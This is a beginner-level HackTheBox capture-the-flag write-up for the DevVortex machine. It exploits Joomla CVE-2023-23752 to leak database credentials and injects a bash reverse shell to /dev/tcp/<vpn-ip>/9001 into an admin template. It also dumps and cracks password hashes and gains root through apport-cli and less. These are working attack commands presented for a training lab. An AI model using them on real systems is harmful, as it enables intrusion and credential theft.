HackTheBox DevVortex Writeup
Explore the fundamentals of cybersecurity with the DevVortex Capture The Flag (CTF) challenge, an easy-level experience ideal for beginners! This straightforward CTF writeup offers clear insights into key concepts, presented with clarity and simplicity.
Add Hosts#
Edit the /etc/hosts file and add the following entries:
10.10.11.242 devvortex.htb dev.devvortex.htb
dev.devvortex.htb was found with a subdomain finder like:
gobuster dns -d "devvortex.htb" -w subdomains-top1million-5000.txt -t "$(nproc)"
This ensures that your system can resolve the domain names devvortex.htb and dev.devvortex.htb to the correct IP address 10.10.11.242.
Script to add hosts automatically#
ip="10.10.11.242"
domain="devvortex.htb dev.devvortex.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping#
nmap -sCV devvortex.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Gather Information From Joomla#
Use the following command to retrieve information from the specified API endpoint from joomla CVE-2023-23752:
curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s
This command fetches data from the specified URL in silent mode (-s) and displays the output.
Script to parse user,password from the result#
USER=$(curl "dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s | jq -r '.data[] | select(.attributes.user) | .attributes.user')
PASSWORD=$(curl "dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s | jq -r '.data[] | select(.attributes.password) | .attributes.password')
DBPREFIX=$(curl "dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s | jq -r '.data[] | select(.attributes.dbprefix) | .attributes.dbprefix')
echo -e "dev.devvortex.htb/administrator webpage credentials:\n usr: $USER\n pasw: $PASSWORD"
Log in to Joomla Admin Panel#
Access the Joomla administrator webpage at:
http://dev.devvortex.htb/administrator
Navigate to System > Administration Templates > index.php and add the following command after <?php:
Replace
<vpn-ip>with your actual VPN IP to receive the connection.
system('/bin/bash -c "bash -i >& /dev/tcp/<vpn-ip>/9001 0>&1"');
Then, start a listener on port 9001 to catch the reverse shell:
nc -lvnp 9001
Trigger the command execution by visiting the administrator webpage:
curl -s http://dev.devvortex.htb/administrator/index.php
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Extract Password Hash From MySQL#
Log in to MySQL using the provided credentials:
mysql -u '<user>' -p joomla --password='<password>'
Extract the password hash:
show tables;
select * from sd4fg_users;
Brute Force the Hash#
Use a hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -rf /tmp/hash.txt
SSH Login with Discovered Password#
Once you find the password, log in via SSH using the discovered credentials:
ssh logan@devvortex.htb
Obtain User Flag#
Retrieve the user flag by running the following command:
cat "$HOME/user.txt"
Privilege Escalation#
run sudo -l to find the programs tath can run as root
Execute the following steps for privilege escalation:
- Run the command:
sudo /usr/bin/apport-cli -f
- send input 1
- send input 2
- View the report and Wait for approximately 10 seconds.
:!/bin/bash
This command exploits the less utility to spawn a shell, as described in GTFOBins.
this append because apport-cli uses less under the hood and is executed as root.
Obtain Root flag#
cat /root/root.txt